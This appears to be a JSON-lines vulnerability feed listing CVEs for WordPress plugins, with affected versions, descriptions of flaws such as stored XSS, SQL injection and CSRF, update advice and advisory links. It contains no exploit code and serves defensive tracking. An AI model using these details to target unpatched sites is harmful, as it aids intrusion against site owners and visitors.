{"CVE_ID":"CVE-2024-3896","slug":"robo-gallery","versionImpact":"3.2.19","versionEndExcluding":"3.2.20","description":"The Photo Gallery, Images, Slider in Rbs Image Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Gallery title field in all versions up to, and including, 3.2.19 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.2.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/69ab404b-1c2f-441b-8622-3cf830587d95?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/69ab404b-1c2f-441b-8622-3cf830587d95?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3100759\\\/robo-gallery\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3100759\\\/robo-gallery\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0377","slug":"scriptless-social-sharing","versionEndExcluding":"3.2.2","description":"The Scriptless Social Sharing WordPress plugin before 3.2.2 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5b1aacd1-3f75-4a6f-8146-cbb98a713724\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5b1aacd1-3f75-4a6f-8146-cbb98a713724\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1507","slug":"googleanalytics","versionImpact":"3.2.1","versionEndExcluding":"3.2.2","description":"The ShareThis Dashboard for Google Analytics plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the handle_actions() function in all versions up to, and including, 3.2.1. This makes it possible for unauthenticated attackers to disable all features.","recommendation":"Update to version 3.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3255511\\\/googleanalytics\\\/trunk\\\/class\\\/core\\\/class-ga-controller-core.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3255511\\\/googleanalytics\\\/trunk\\\/class\\\/core\\\/class-ga-controller-core.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/314b8638-15e7-461d-a705-3858fe6813e7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/314b8638-15e7-461d-a705-3858fe6813e7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8536","slug":"ultimate-blocks","versionImpact":"3.2.1","versionEndExcluding":"3.2.2","description":"The Ultimate Blocks WordPress plugin before 3.2.2 does not validate and escape some of its block attributes before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","recommendation":"Update to version 3.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/abd5b6c6-f541-4739-882d-2011436f7a8b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/abd5b6c6-f541-4739-882d-2011436f7a8b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3062","slug":"save-as-image-by-pdfcrowd","versionImpact":"3.2.1","versionEndExcluding":"3.2.2","description":"The Save as Image Plugin by Pdfcrowd WordPress plugin before 3.2.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 3.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1526985d-2f8f-4b2a-97f3-633c51d024b8\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1526985d-2f8f-4b2a-97f3-633c51d024b8\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12257","slug":"cardgate","versionImpact":"3.2.1","versionEndExcluding":"3.2.2","description":"The CardGate Payments for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 3.2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3203585\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3203585\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9f8de5a9-2279-4b84-b1f6-fdb293aa6017?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9f8de5a9-2279-4b84-b1f6-fdb293aa6017?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4145","slug":"search-and-replace","versionImpact":"3.2.1","versionEndExcluding":"3.2.2","description":"The Search & Replace WordPress plugin before 3.2.2 does not sanitize and escape a parameter before using it in a SQL statement, allowing admins to perform SQL injection attacks (such as within a multi-site network).","recommendation":"Update to version 3.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7d5b8764-c82d-4969-a707-f38b63bcadca\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7d5b8764-c82d-4969-a707-f38b63bcadca\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4633","slug":"depicter","versionImpact":"3.2.1","versionEndExcluding":"3.2.2","description":"The Slider and Carousel slider by Depicter plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018addExtraMimeType\u2019 function in versions up to, and including, 3.2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/depicter\\\/tags\\\/2.1.11\\\/app\\\/src\\\/WordPress\\\/SVGServiceProvider.php#L52\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/depicter\\\/tags\\\/2.1.11\\\/app\\\/src\\\/WordPress\\\/SVGServiceProvider.php#L52\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3134888\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3134888\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/965cacd3-1786-4e7d-8209-eea293b161d3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/965cacd3-1786-4e7d-8209-eea293b161d3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11939","slug":"cost-calculator-builder-pro","versionImpact":"3.2.15","versionEndExcluding":"3.2.16","description":"The Cost Calculator Builder PRO plugin for WordPress is vulnerable to blind time-based SQL Injection via the \u2018data\u2019 parameter in all versions up to, and including, 3.2.15 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 3.2.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/docs.stylemixthemes.com\\\/cost-calculator-builder\\\/changelog-1\\\/changelog-pro-version#id-3.2.16\",\"name\":\"https:\\\/\\\/docs.stylemixthemes.com\\\/cost-calculator-builder\\\/changelog-1\\\/changelog-pro-version#id-3.2.16\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96ad872f-9831-4113-99ae-322bcd2b6fbd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96ad872f-9831-4113-99ae-322bcd2b6fbd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3499","slug":"robo-gallery","versionEndExcluding":"3.2.16","description":"The Photo Gallery, Images, Slider in Rbs Image Gallery WordPress plugin before 3.2.16 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ea29413b-494e-410e-ae42-42f96284899c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ea29413b-494e-410e-ae42-42f96284899c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9504","slug":"booking-calendar","versionImpact":"3.2.15","versionEndExcluding":"3.2.16","description":"The Booking calendar, Appointment Booking System plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 3.2.15 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","recommendation":"Update to version 3.2.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/hacked.be\\\/posts\\\/CVE-2024-9504\",\"name\":\"https:\\\/\\\/hacked.be\\\/posts\\\/CVE-2024-9504\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3195800\\\/booking-calendar\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3195800\\\/booking-calendar\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1fb05281-205f-4d9c-aac9-2b37e069a6fb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1fb05281-205f-4d9c-aac9-2b37e069a6fb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11090","slug":"restrict-content","versionImpact":"3.2.13","versionEndExcluding":"3.2.14","description":"The Membership Plugin \u2013 Restrict Content plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.2.13 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to higher-level roles such as administrator.","recommendation":"Update to version 3.2.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3227065\\\/restrict-content\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3227065\\\/restrict-content\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7615c391-ccb1-4990-bbfd-949782cc609a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7615c391-ccb1-4990-bbfd-949782cc609a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4684","slug":"blockspare","versionImpact":"3.2.13.1","versionEndExcluding":"3.2.13.2","description":"The BlockSpare: Gutenberg Blocks & Patterns for Blogs, Magazines, Business Sites \u2013 Post Grids, Sliders, Carousels, Counters, Page Builder & Starter Site Imports, No Coding Needed plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the HTML attributes of Image Carousel and Image Slider widgets in all versions up to, and including, 3.2.13.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.2.13.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blockspare\\\/trunk\\\/dist\\\/blocks.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blockspare\\\/trunk\\\/dist\\\/blocks.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f4f8b84-3f65-430b-b749-6afae8d53153?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f4f8b84-3f65-430b-b749-6afae8d53153?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6687","slug":"ctt-expresso-para-woocommerce","versionImpact":"3.2.12","versionEndExcluding":"3.2.13","description":"The CTT Expresso para WooCommerce plugin for WordPress is vulnerable to sensitive information exposure in all versions up to and including 3.2.12 via the \/wp-content\/uploads\/cepw directory. The generated .pdf and log files are publicly accessible and contain sensitive information such as sender and receiver names, phone numbers, physical addresses, and email addresses","recommendation":"Update to version 3.2.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/13088645-8233-40fb-8755-cbdf44c0eaf7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/13088645-8233-40fb-8755-cbdf44c0eaf7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3127496%40ctt-expresso-para-woocommerce&new=3127496%40ctt-expresso-para-woocommerce&sfp_email=&sfph_mail=#file25\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3127496%40ctt-expresso-para-woocommerce&new=3127496%40ctt-expresso-para-woocommerce&sfp_email=&sfph_mail=#file25\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0718","slug":"wp-nested-pages","versionImpact":"3.2.12","versionEndExcluding":"3.2.13","description":"The Nested Pages WordPress plugin before 3.2.13 does not sanitise and escape some of its settings, which could allow high privilege users such as contributors to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.2.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/69ddd8eb-33f1-49cf-9428-3d89262b1887\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/69ddd8eb-33f1-49cf-9428-3d89262b1887\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6478","slug":"ctt-expresso-para-woocommerce","versionImpact":"3.2.12","versionEndExcluding":"3.2.13","description":"The CTT Expresso para WooCommerce WordPress plugin before 3.2.13 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 3.2.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/39a78741-eeae-4a27-8136-7d0bb0bf2263\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/39a78741-eeae-4a27-8136-7d0bb0bf2263\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6012","slug":"cost-calculator-builder","versionImpact":"3.2.12","versionEndExcluding":"3.2.13","description":"The Cost Calculator Builder plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'embed-create-page' and 'embed-insert-pages' functions in all versions up to, and including, 3.2.12. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create arbitrary posts and append arbitrary content to existing posts.","recommendation":"Update to version 3.2.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fd7da039-f6b8-46b7-a43a-145e9f8844c3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fd7da039-f6b8-46b7-a43a-145e9f8844c3?source=cve\",\"refsource\":\"\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cost-calculator-builder\\\/trunk\\\/frontend\\\/dist\\\/admin.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cost-calculator-builder\\\/trunk\\\/frontend\\\/dist\\\/admin.js\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3108606\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3108606\\\/\",\"refsource\":\"\",\"tags\":[\"Patch\"]}]"}
{"CVE_ID":"CVE-2024-6011","slug":"cost-calculator-builder","versionImpact":"3.2.12","versionEndExcluding":"3.2.13","description":"The Cost Calculator Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018textarea.description\u2019 parameter in all versions up to, and including, 3.2.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.2.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/03ad3677-1b02-4f22-af50-e88b2ec83f54?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/03ad3677-1b02-4f22-af50-e88b2ec83f54?source=cve\",\"refsource\":\"\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https:\\\/\\\/drive.google.com\\\/file\\\/d\\\/1SFQXlRUQw7THm_Vay_pFH3pIX1cjH4AY\\\/view?usp=sharing\",\"name\":\"https:\\\/\\\/drive.google.com\\\/file\\\/d\\\/1SFQXlRUQw7THm_Vay_pFH3pIX1cjH4AY\\\/view?usp=sharing\",\"refsource\":\"\",\"tags\":[\"Exploit\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cost-calculator-builder\\\/trunk\\\/templates\\\/frontend\\\/fields\\\/cost-text.php#L15\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cost-calculator-builder\\\/trunk\\\/templates\\\/frontend\\\/fields\\\/cost-text.php#L15\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cost-calculator-builder\\\/trunk\\\/templates\\\/frontend\\\/fields\\\/cost-text.php#L26\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cost-calculator-builder\\\/trunk\\\/templates\\\/frontend\\\/fields\\\/cost-text.php#L26\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3108606\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3108606\\\/\",\"refsource\":\"\",\"tags\":[\"Patch\"]}]"}
{"CVE_ID":"CVE-2025-7367","slug":"strong-testimonials","versionImpact":"3.2.11","versionEndExcluding":"3.2.12","description":"The Strong Testimonials plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Testimonial Custom Fields in all versions up to, and including, 3.2.11 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.2.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/strong-testimonials\\\/tags\\\/3.2.11\\\/includes\\\/functions-template.php#L317\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/strong-testimonials\\\/tags\\\/3.2.11\\\/includes\\\/functions-template.php#L317\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/strong-testimonials\\\/tags\\\/3.2.11\\\/includes\\\/functions-template.php#L532\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/strong-testimonials\\\/tags\\\/3.2.11\\\/includes\\\/functions-template.php#L532\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/65395034-0b20-462c-93ee-e755e5c888a4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/65395034-0b20-462c-93ee-e755e5c888a4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11008","slug":"members","versionImpact":"3.2.10","versionEndExcluding":"3.2.11","description":"The Members \u2013 Membership & User Role Editor Plugin plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.2.10 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to higher-level roles such as administrator.","recommendation":"Update to version 3.2.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3199682\\\/members\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3199682\\\/members\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f6ad375-da04-4b56-8077-e26c148e7527?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f6ad375-da04-4b56-8077-e26c148e7527?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4567","slug":"post-slider-and-carousel","versionImpact":"3.2.9","versionEndExcluding":"3.2.10","description":"The Post Slider and Post Carousel with Post Vertical Scrolling Widget WordPress plugin before 3.2.10 does not validate and escape some of its Widget options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 3.2.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b8a50ae9-40c4-42f8-9342-2440d3bc12bb\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b8a50ae9-40c4-42f8-9342-2440d3bc12bb\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3956","slug":"pods","versionImpact":"3.2.1","versionEndExcluding":"3.2.1.1","description":"The Pods \u2013 Custom Content Types and Fields plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Pod Form widget in all versions up to, and including, 3.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.2.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a0707c92-96e9-444a-8a13-52d49c9e3f5c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a0707c92-96e9-444a-8a13-52d49c9e3f5c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pods\\\/tags\\\/3.2.1\\\/ui\\\/front\\\/form.php#L105\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pods\\\/tags\\\/3.2.1\\\/ui\\\/front\\\/form.php#L105\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083418\\\/pods\\\/tags\\\/3.1.4.1\\\/includes\\\/data.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083418\\\/pods\\\/tags\\\/3.1.4.1\\\/includes\\\/data.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083418\\\/pods\\\/tags\\\/3.1.4.1\\\/ui\\\/front\\\/form.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083418\\\/pods\\\/tags\\\/3.1.4.1\\\/ui\\\/front\\\/form.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/pods.io\\\/2024\\\/05\\\/08\\\/pods-3-2-1-1-security-release\\\/\",\"name\":\"https:\\\/\\\/pods.io\\\/2024\\\/05\\\/08\\\/pods-3-2-1-1-security-release\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4958","slug":"user-registration","versionImpact":"3.2.0.1","versionEndExcluding":"3.2.1","description":"The User Registration \u2013 Custom Registration Form, Login Form, and User Profile WordPress Plugin plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'import_form_action' function in versions up to, and including, 3.2.0.1. This makes it possible for authenticated attackers, with contributor-level permissions and above, to import a registration form with a default user role of administrator. If an administrator approves or publishes a post or page with the shortcode to the imported form, any user can register as an administrator.","recommendation":"Update to version 3.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/710574a8-a6e2-4ee6-9ea7-03a34994fec7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/710574a8-a6e2-4ee6-9ea7-03a34994fec7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3095484\\\/user-registration\\\/tags\\\/3.2.1\\\/includes\\\/class-ur-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3095484\\\/user-registration\\\/tags\\\/3.2.1\\\/includes\\\/class-ur-ajax.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2871","slug":"quadmenu","versionImpact":"3.2.0","versionEndExcluding":"3.2.1","description":"The WordPress Mega Menu \u2013 QuadMenu plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.2.0. This is due to missing or incorrect nonce validation on the ajax_dismiss_notice() function. This makes it possible for unauthenticated attackers to update any user meta to a value of one, including wp_capabilities which could result in a privilege deescalation of an administrator, via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 3.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/quadmenu\\\/tags\\\/3.2.0\\\/lib\\\/class-admin.php#L105\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/quadmenu\\\/tags\\\/3.2.0\\\/lib\\\/class-admin.php#L105\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3270825\\\/quadmenu\\\/tags\\\/3.2.1\\\/lib\\\/class-admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3270825\\\/quadmenu\\\/tags\\\/3.2.1\\\/lib\\\/class-admin.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1ba7b675-54d6-4f0e-b60f-1c7fa6ff24ea?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1ba7b675-54d6-4f0e-b60f-1c7fa6ff24ea?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5937","slug":"paid-membership","versionImpact":"3.2.0","versionEndExcluding":"3.2.1","description":"The MicroPayments \u2013 Fans Paysite: Paid Creator Subscriptions, Digital Assets, Wallet plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.2.0. This is due to missing or incorrect nonce validation on the adminOptions() function. This makes it possible for unauthenticated attackers to reset the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 3.2.1, or a newer patched 